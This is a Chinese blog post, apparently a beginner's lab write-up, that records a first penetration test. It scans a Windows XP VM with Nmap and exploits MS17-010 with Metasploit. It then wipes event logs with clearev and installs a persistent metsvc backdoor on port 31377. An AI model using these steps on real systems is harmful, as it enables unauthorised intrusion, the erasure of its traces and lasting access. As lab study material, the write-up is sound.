栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

记录第一次渗透操作

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

记录第一次渗透操作

记录第一次渗透操作 一、环境准备
  • VMware Windows XP 靶机(192.168.10.128)

  • VMware Kali Linux 攻击机(192.168.10.129)

二、攻击前准备(Nmap的使用)
  1. 首先在Kali的命令终端中输入 sudo msfconsole 进入MSF控制台。

  2. 运行 Nmap 对靶机进行信息收集

    [*] exec: nmap 192.168.10.128      
                        
    Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-08 22:32 EDT                                                                                                                                                     
    Nmap scan report for 192.168.10.128                                                                                                                                                                                 
    Host is up (0.00052s latency).                                                                                     
    Not shown: 988 closed ports                                                                                                                                                                                         
    PORT     STATE SERVICE     
    25/tcp   open  smtp   
    80/tcp   open  http     
    135/tcp  open  msrpc     
    139/tcp  open  netbios-ssn   
    443/tcp  open  https       
    445/tcp  open  microsoft-ds                                                                                        
    777/tcp  open  multiling-http       
    1027/tcp open  IIS       
    3389/tcp open  ms-wbt-server  
    6002/tcp open  X11:2          
    7001/tcp open  afs3-callback       
    7002/tcp open  afs3-prserver      
    MAC Address: 00:0C:29:D1:04:41 (VMware)                                                                                                                      
    Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
    
    
  3. 通过 Matasploit 对靶机已知的漏洞 MS17-010 进行攻击

    首先,搜索 MS17-010 漏洞的可用攻击模块 search ms17-010

    选择一个攻击模块

这里使用默认的攻击载荷(payload)就行

使用 show options 命令检查所有攻击参数

只要设置靶机地址就行了(LHOSTS) set rhosts 192.168.10.128

使用 show options 命令检查一下

确认无误后 run

三、后渗透操作
  1. 可以看到成功入侵到靶机,使用 screenshot 检查一下

    出现 Screenshot saved to: /home/kali/oBPzDfpw.jpeg

  2. 删除系统日志文件

    clearev , 检查一下,可以看到日志都清空了

  1. 执行 run metsvc -A 上传服务后门

    发现后门服务成功上传,这时候可以利用图中的31377端口对靶机进行攻击了

    这时候退出重新 nmap 一下,成功

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/871324.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号